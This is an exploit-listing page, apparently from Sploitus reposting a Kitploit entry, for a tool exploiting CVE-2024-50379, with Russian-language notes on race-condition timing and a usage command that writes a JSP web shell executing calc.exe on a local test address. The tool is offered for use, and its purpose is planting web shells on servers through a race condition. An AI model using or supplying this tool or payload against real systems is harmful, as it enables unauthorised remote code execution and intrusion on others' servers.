Sploitus

Exploit for CVE-2024-50379-exp

kitploit · 2026-08-26

Exploit Code

MARKDOWN18 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-LUX-J-CVE-2024-50379-EXP
# CVE-2024-50379-exp

  * -t время гонки условий
  * -u домен
  * -f запись веб-шелла



В ходе тестирования было обнаружено, что при первой гонке условий существует большая вероятность неудачной записи. Для успешной записи веб-шелла требуется повторная гонка условий. Поэтому скрипт сначала выполняет фиксированную 6-секундную гонку условий, проверяя, была ли запись произведена. Если нет, выполняется пользовательская или стандартная 10-секундная проверка. Сгенерированный веб-шелл имеет случайное имя в формате md5.jsp.

root@kitploit:~
    
    
    python .\CVE-2024-50379.py -u http://192.168.31.33:8888/ -f '123456<%Runtime,getRuntime().exec("calc.exe");%>' -t 10
    

image